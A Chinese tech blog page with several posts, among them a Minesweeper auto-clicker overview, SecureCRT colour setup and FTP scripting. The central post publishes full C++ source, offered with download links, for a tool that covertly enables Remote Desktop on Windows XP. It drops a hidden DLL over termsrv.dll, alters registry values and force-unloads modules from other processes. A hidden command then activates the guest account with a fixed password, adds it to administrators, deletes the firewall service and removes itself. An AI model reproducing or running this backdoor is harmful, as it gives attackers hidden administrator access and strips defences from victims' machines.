
Python 扫雷工具

[ 2012/03/01 13:53 | by selboo ]
      先说下原理,原理其实很简单:设法获得“雷区”的数据,然后通过模拟鼠标动作,点击雷区上非地雷的格子,就搞定了:) 所以技术难点只有三个:获得雷区数据、找到扫雷程序和模拟鼠标动作。

     先说简单的,找到扫雷程序。通过win32gui.FindWindow("扫雷", "扫雷") 就可以找到扫雷程序的主窗体了,很简单吧。FindWindow这个API参数含义参看MSDN.然后是模拟鼠标点击动作,这也很简单,通过win32api.SendMessage来向窗体发送鼠标的按下WM_LBUTTONDOWN和松开WM_LBUTTONUP消息就行了,这个api的主要参数是,接收信息的窗体句柄(这里是扫雷程序的主窗体)和鼠标点击的坐标。这个api的使用不难,具体参考MSDN:)

     比较有难度的是如何获得雷区数据。这里有两个事情要做,首先要找出雷区在程序内部是如何表示的,如何区分格子是有雷还是无雷

SecureCRT显示彩色脚本

[ 2009/06/26 16:57 | by selboo ]
在 vi 中编辑时以彩色显示脚本内容,这样更便于修改和查看

打开 SecureCRT 选项 => 会话选项 => 仿真 终端选择 "Xterm" 再选中后面的"ANSI Color"


在系统安装 vim

查看是否安装有vim

[selboo@selboo ~]$ rpm -qa |grep vim
vim-enhanced-7.0.109-4.el5_2.4z
vim-minimal-7.0.109-4.el5_2.4z
vim-common-7.0.109-4.el5_2.4z
[selboo@selboo ~]$

确定有的话,直接在/etc/profile文件中加入如下的这一行即可(不过要重新进入终端才能生效)
alias vi=vim

第二种方法

1> secureCRT的设置。确保仿真终端类型为linux,并勾选“ANSI颜色选项”。
2> 服务器端的设置。在.bashrc中添加:export TERM=xterm 语句

XP的3389双开

[ 2009/03/02 13:08 | by selboo ]
作者:cooldiyer
来源:红狼

很早时候写的,方便大家用,代码丢了我也可以百度到
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..
代码:

// xp3389.cpp : XP下双开3389的工具 Code By CoolDiyer
//
#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")
#include "stdafx.h"
#include "resource.h"
#include
#include
// Look up a process ID by executable name using a Toolhelp process snapshot.
//   szProcName - executable file name, compared case-insensitively (lstrcmpi)
//                with each snapshot entry's szExeFile.
// Returns the th32ProcessID of the first matching entry, or NULL (0) when no
// entry matches or the snapshot handle tests false.
// NOTE(review): the name is the same as the Win32 GetProcessId API; this
// definition takes a name instead of a handle - confirm how it resolves against
// the SDK headers in use.
DWORD
GetProcessId(LPCTSTR szProcName)
{
PROCESSENTRY32 pe;
DWORD dwPid;
DWORD dwRet;
BOOL bFound = FALSE;

HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
// NOTE(review): CreateToolhelp32Snapshot reports failure as INVALID_HANDLE_VALUE,
// which this test treats as a usable handle.
if (hSP)
{
  // dwSize must be set before the first Process32First call.
  pe.dwSize = sizeof( pe );

  // Walk every process entry until the name matches or the list ends.
  for (dwRet = Process32First(hSP, &pe);
  dwRet;
  dwRet = Process32Next(hSP, &pe))
  {
   if (lstrcmpi( szProcName, pe.szExeFile) == 0)
   {
    dwPid = pe.th32ProcessID;
    bFound = TRUE;
    break;
   }
  }
  CloseHandle(hSP);

  // dwPid is only assigned on a match, so it is read only when bFound is set.
  if (bFound == TRUE)
  {
   return dwPid;
  }
}
return NULL;
}

// EnumWindows callback: sends WM_CLOSE to every visible top-level window that
// belongs to the process whose ID is passed in lParam.
//   hwnd   - window handed in by the enumeration.
//   lParam - target process ID, cast from DWORD by the caller.
// Always returns true, so the enumeration continues over all windows.
bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
// Invisible windows are skipped without being inspected.
if (!IsWindowVisible(hwnd))
  return true;

// Despite its name this receives the owning *process* ID: it is passed as the
// second (out) argument of GetWindowThreadProcessId; the thread ID return value
// is discarded.
DWORD dwWindowThreadId = NULL;
// Unused local; the comparison below reads lParam directly.
DWORD  dwLsassId = (DWORD)lParam;
GetWindowThreadProcessId(hwnd, &dwWindowThreadId);
if (dwWindowThreadId == (DWORD)lParam)
{
  // Close the window that belongs to the specified process
  SendMessage(hwnd, WM_CLOSE, 0, 0);
}
return true;
}
// Write data under the given registry key (Mode: 0 - create the key and set data,
// 1 - set data on an existing key, 2 - delete the named subkey, 3 - delete the
// named value) from NameLess114
//   MainKey - root key handle (callers in this file pass HKEY_LOCAL_MACHINE).
//   SubKey  - path of the key below MainKey.
//   Vname   - value name (modes 0, 1, 3) or subkey name (mode 2).
//   Type    - REG_SZ / REG_EXPAND_SZ use szData, REG_DWORD uses dwData;
//             REG_BINARY is accepted but writes nothing.
// Returns 1 when the final set/delete call succeeded, otherwise 0.
int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode)
{
HKEY  hKey;
DWORD dwDisposition;
int   iResult =0;

__try
{
  // SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);
  switch(Mode)
  {
  case 0:
   if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)
    __leave;
   // No break: mode 0 falls through into mode 1, which reopens the key and
   // overwrites hKey (the handle from RegCreateKeyEx is not closed).
  case 1:
   if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
    __leave;
   switch(Type)
   {
   case REG_SZ:
   case REG_EXPAND_SZ:
    // String length plus one so the terminating NUL is stored as well.
    if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1) == ERROR_SUCCESS)
     iResult =1;
    break;
   case REG_DWORD:
                 if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS)
     iResult =1;
    break;
   case REG_BINARY:
    // Not implemented: nothing is written and iResult stays 0.
    break;
   }
   break;
   case 2:
    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
     __leave;
    // Vname is treated as the name of a subkey of SubKey here.
    if (RegDeleteKey(hKey,Vname) == ERROR_SUCCESS)
     iResult =1;
    break;
   case 3:
    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
     __leave;
    if (RegDeleteValue(hKey,Vname) == ERROR_SUCCESS)
     iResult =1;
    break;
  }
}
__finally
{
  // Runs on every exit path, including the __leave cases above.
  // NOTE(review): hKey is uninitialized when the create/open call failed, and
  // MainKey is the caller's root handle rather than one opened here.
  RegCloseKey(MainKey);
  RegCloseKey(hKey);
}
return iResult;
}
// Enable or disable one named privilege on the current process token.
//   PName   - privilege name; callers in this file pass SE_DEBUG_NAME and
//             SE_SHUTDOWN_NAME.
//   bEnable - TRUE sets SE_PRIVILEGE_ENABLED, FALSE clears the attribute.
// Returns false when the token cannot be opened or when GetLastError() is not
// ERROR_SUCCESS after the adjustment; true otherwise.
bool DebugPrivilege(const char *PName, BOOL bEnable)
{
BOOL              bResult = TRUE;
HANDLE            hToken;
TOKEN_PRIVILEGES  TokenPrivileges;

if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
{
  bResult = FALSE;
  return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;

// The return value of the lookup is not checked; a failed lookup leaves Luid unset.
LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    // The last-error value is inspected instead of the call's return value, so a
    // privilege the token does not hold is reported as failure.
    if (GetLastError() != ERROR_SUCCESS)
{
  bResult = FALSE;
}

CloseHandle(hToken);
return bResult;
}
// Ask another process to unload one of its modules by running FreeLibrary inside
// it on a remote thread.
//   dwProcessID   - ID of the process that has the module loaded.
//   hModuleHandle - module handle as seen inside that process.
// Returns false when the handle is NULL, the process cannot be opened or the
// remote thread cannot be created; true once the thread has finished. The result
// of FreeLibrary itself is not inspected.
// Remote thread creation in a foreign process is a behaviour endpoint monitoring
// commonly records (for example Sysmon's CreateRemoteThread event).
bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle)
{
HANDLE hRemoteThread;
HANDLE hProcess;

if (hModuleHandle == NULL)
  return false;
hProcess=::OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID);
if (hProcess == NULL)
  return false;

// The address is resolved in the calling process and reused in the target.
// NOTE(review): presumably relies on kernel32.dll being mapped at the same base
// in both processes - confirm.
HMODULE hModule=::GetModuleHandle(”kernel32.dll”);
LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, “FreeLibrary”);
// The module handle is passed as the thread argument.
hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);

if(hRemoteThread==NULL)
{
  ::CloseHandle(hProcess);
  return false;
}
// Blocks with no timeout until the remote thread exits.
::WaitForSingleObject(hRemoteThread,INFINITE);
::CloseHandle(hProcess);
::CloseHandle(hRemoteThread);
return true;
}
// Find a loaded module in a given process by its full path.
//   dwProcessID  - process whose module list is snapshotted.
//   lpModulePath - path compared case-insensitively with each entry's szExePath.
// Returns the entry's hModule for the first match, or NULL when none matches.
HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath)
{
HANDLE hModuleHandle = NULL;
MODULEENTRY32 me32={0};
// The snapshot handle is used without a validity check; when the snapshot could
// not be taken, Module32First fails and NULL is returned.
HANDLE hModuleSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);
me32.dwSize=sizeof(MODULEENTRY32);
if(::Module32First(hModuleSnap, &me32))
{
  do
  {
   // lstrcmpi returns 0 on equality, hence the negation.
   if (!lstrcmpi(me32.szExePath, lpModulePath))
   {
    hModuleHandle = me32.hModule;
    break;
   }
  }while(::Module32Next(hModuleSnap,&me32));
}
::CloseHandle(hModuleSnap);
return hModuleHandle;
}
// Walk every running process and, wherever the module at lpModulePath is loaded,
// request its unload through UnloadRemoteModule.
//   lpModulePath - full path of the module to look for in each process.
// Returns the result of the last unload attempt; false when no process had the
// module loaded. An earlier success is overwritten by a later failure.
bool UnloadModule(LPCTSTR lpModulePath)
{
BOOL bRet = false;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);

HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

// Find the relevant processes
if(::Process32First(hProcessSnap, &pe32))
{
  do
  {
   // A NULL result means this process does not have the module loaded.
   HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);
   if (hModuleHandle != NULL)
   {
    bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);
   }
  }while (Process32Next(hProcessSnap,&pe32));
}
CloseHandle(hProcessSnap);
return bRet;
}
// Start an installed service by name through the service control manager.
//   lpService - service name; WinMain passes the Terminal Services service name.
// Nothing is returned and no failure is reported: when the SCM or the service
// cannot be opened the function does nothing.
void StartService(LPCTSTR lpService)
{
SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );
if ( NULL != hSCManager )
{
  // DELETE access is requested although only a start is performed below.
  SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);
  if ( NULL != hService )
  {
   // Three-argument call: the Win32 service API, not this one-argument function.
   // Its return value is ignored.
   StartService(hService, 0, NULL);
   CloseServiceHandle( hService );
  }
  CloseServiceHandle( hSCManager );
}
}
// Write a resource embedded in this executable out to a file on disk.
//   wResourceID - numeric resource ID.
//   lpType      - resource type name.
//   lpFileName  - destination path; an existing file is overwritten
//                 (CREATE_ALWAYS).
// Returns FALSE when the resource cannot be found or loaded, or when the file
// handle compares equal to NULL; TRUE otherwise. The WriteFile result and the
// byte count in dwBytes are not checked, so TRUE does not prove the data reached
// the disk.
BOOL ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;

// A NULL module handle addresses the resources of the running executable.
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
  return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
  return FALSE;
hFile = CreateFile
  (
  lpFileName,
  GENERIC_WRITE,
  FILE_SHARE_WRITE,
  NULL,
  CREATE_ALWAYS,
  FILE_ATTRIBUTE_NORMAL,
  NULL
  );
if (hFile == NULL)
  return FALSE;
// The handle returned by LoadResource is used directly as the data pointer.
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);

return TRUE;
}
// Apply the registry changes the tool depends on. Every call uses Mode 0 of
// WriteRegEx (create the key if needed, then set the value) under
// HKEY_LOCAL_MACHINE; return values are ignored.
// The five values written here are the ones to compare against a known-good
// baseline when examining a host for this tool.
void SetReg()
{
// Service start type of TermService set to 2.
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Services\\TermService”,”Start”,REG_DWORD,NULL,2,0);
// Winlogon string value KeepRASConnections set to the string 1.
WriteRegEx(HKEY_LOCAL_MACHINE, “SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”, “KeepRASConnections”, REG_SZ, “1″, 0, 0);
// fDenyTSConnections set to 0.
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Control\\Terminal Server”, “fDenyTSConnections”, REG_DWORD, NULL, 0, 0);
// EnableConcurrentSessions set to 1.
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core”, “EnableConcurrentSessions”,
  REG_DWORD, NULL, 1, 0);
// ServiceDll of TermService is pointed at termsrvhack.dll in system32; a
// ServiceDll value that does not name the stock termsrv.dll is the clearest
// registry indicator of this modification.
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters”, “ServiceDll”, REG_EXPAND_SZ,
  “%SystemRoot%\\system32\\termsrvhack.dll”, 0, 0);
}
// Write the embedded resource IDR_DLL (type BIN) to two locations below the
// system directory - termsrvhack.dll and dllcache\termsrvhack.dll - and mark both
// files hidden, read-only and system.
// Return values of ReleaseResource and SetFileAttributes are ignored.
// Files with these attributes are left out of a default directory listing, so a
// check for them has to include hidden and system files.
void ReleaseDll()
{
char strSystemPath[MAX_PATH];
char strDllcachePath[MAX_PATH];
// Both buffers start out as the system directory path.
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
GetSystemDirectory(strDllcachePath, sizeof(strDllcachePath));
// Appended without a length check against MAX_PATH.
lstrcat(strSystemPath, “\\termsrvhack.dll”);
lstrcat(strDllcachePath, “\\dllcache\\termsrvhack.dll”);
ReleaseResource(IDR_DLL, “BIN”, strSystemPath);
ReleaseResource(IDR_DLL, “BIN”, strDllcachePath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(strDllcachePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
}
// Report whether the running OS identifies itself as version 5.1, the version
// number this tool treats as Windows XP.
// The GetVersionEx return value is not checked; on failure the structure's
// version fields are read uninitialized.
bool IsOSXP()
{
OSVERSIONINFOEX OsVerInfoEx;
OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((OSVERSIONINFO *)&OsVerInfoEx); // note the type cast
return OsVerInfoEx.dwMajorVersion == 5 && OsVerInfoEx.dwMinorVersion == 1;
}
// Replace the Terminal Services DLL in use: drop termsrvhack.dll, force every
// process that has the stock termsrv.dll loaded to unload it, then suppress the
// error dialogs and the system shutdown that the forced unload triggers.
// Called from WinMain only when IsOSXP() is true.
// Observable side effects for an investigator: debug and shutdown privileges
// toggled on this process, remote threads created in other processes, windows of
// csrss.exe and drwtsn32.exe closed, and a pending system shutdown aborted.
void HijackService()
{
char strDll[MAX_PATH];
GetSystemDirectory(strDll, sizeof(strDll));
lstrcat(strDll, “\\termsrv.dll”);
// Drop termsrvhack.dll
ReleaseDll();

// Walk the processes and unload the DLL that is currently loaded
DebugPrivilege(SE_DEBUG_NAME, TRUE);
// On this early return the debug privilege is left enabled.
if (!UnloadModule(strDll))
  return;
DebugPrivilege(SE_DEBUG_NAME, FALSE);

// Close the error dialogs that are about to pop up, and the automatic-shutdown
// dialog raised because the forced DLL unload makes some services terminate abnormally
// Grant the process the shutdown privilege
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
// The variable is named after lsass, but the process looked up is csrss.exe.
DWORD dwLsassId = GetProcessId(”csrss.exe”);
// Loops until AbortSystemShutdown succeeds; there is no other exit and no retry limit.
while (!AbortSystemShutdown(NULL))
{
  // Some systems pop up drwtsn32.exe
  DWORD dwDrwtsn32Id = GetProcessId(”drwtsn32.exe”);
  if (dwDrwtsn32Id != NULL)
  {
   EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwDrwtsn32Id);
  }
  // The forced module unload raises errors; close the error windows shown by the csrss.exe process
  EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwLsassId);
  Sleep(10);
}
DebugPrivilege(SE_SHUTDOWN_NAME, FALSE);
}
// Program entry point. Runs the whole sequence with no user interaction and no
// visible window: registry changes, DLL replacement (XP only), service start,
// then a hidden command chain that changes the guest account, removes the
// firewall service and deletes this executable.
// None of the parameters are used. Always returns 0; no step reports failure.
int WINAPI WinMain(
       HINSTANCE hInstance,      // handle to current instance
       HINSTANCE hPrevInstance,  // handle to previous instance
       LPSTR lpCmdLine,          // command line
       int nCmdShow              // show state
       )
{
// Registry changes
SetReg();
if (IsOSXP())
{
  // Replace the DLL
  HijackService();
}
// Start the terminal service
StartService(”TermService”);
// Activate guest, add it to the administrators group, self-delete, stop XP's built-in firewall and delete it
char strCommand[1024];
char strSelf[MAX_PATH];
// Full path of this executable, used as the argument of the del step below.
GetModuleFileName(NULL, strSelf, sizeof(strSelf));
// The commands are joined with &&, so each one runs only when the previous one
// succeeded. The guest password is a fixed string embedded in the command line.
wsprintf(strCommand, “cmd.exe /c net user guest /active:yes && net user guest cooldiyer && net localgroup administrators guest /add && net stop SharedAccess /y && del \”%s\” && sc delete SharedAccess”, strSelf);
// SW_HIDE: the cmd.exe window is never shown. Host-side evidence of this step is
// an enabled guest account that is a member of administrators and a missing
// SharedAccess service; the child cmd.exe command line carries the same strings.
WinExec(strCommand, SW_HIDE);
return 0;
}


xp3389_bin.rar


xp3389_src.rar

linux下脚本实现自动ftp

[ 2009/02/18 20:44 | by selboo ]
建立一个文本文件,例如文件名是ftp.txt(该文件含明文用户名和密码,应限制为仅本人可读,例如 chmod 600 ftp.txt),其内容如下:

open 192.168.1.50 /*用open连接远程服务器192.168.1.50*/
user MYNAME MYPASSWORD /*MYNAME是用户名,MYPASSWORD是密码*/
binary /*以二进制传送*/
hash /*当有数据传送时,显示#号*/
cd REMOTE_PATHNAME /*进入远程目标路径REMOTE_PATHNAME*/
get REMOTE_FILE LOCAL_FILE /*把远程文件REMOTE_FILE下载成本地文件LOCAL_FILE*/
put LOCAL_FILE REMOTE_FILE /*将本地文件LOCAL_FILE上传成远程文件REMOTE_FILE */
bye /*退出ftp应用*/

执行命令:
cat ftp.txt | ftp -n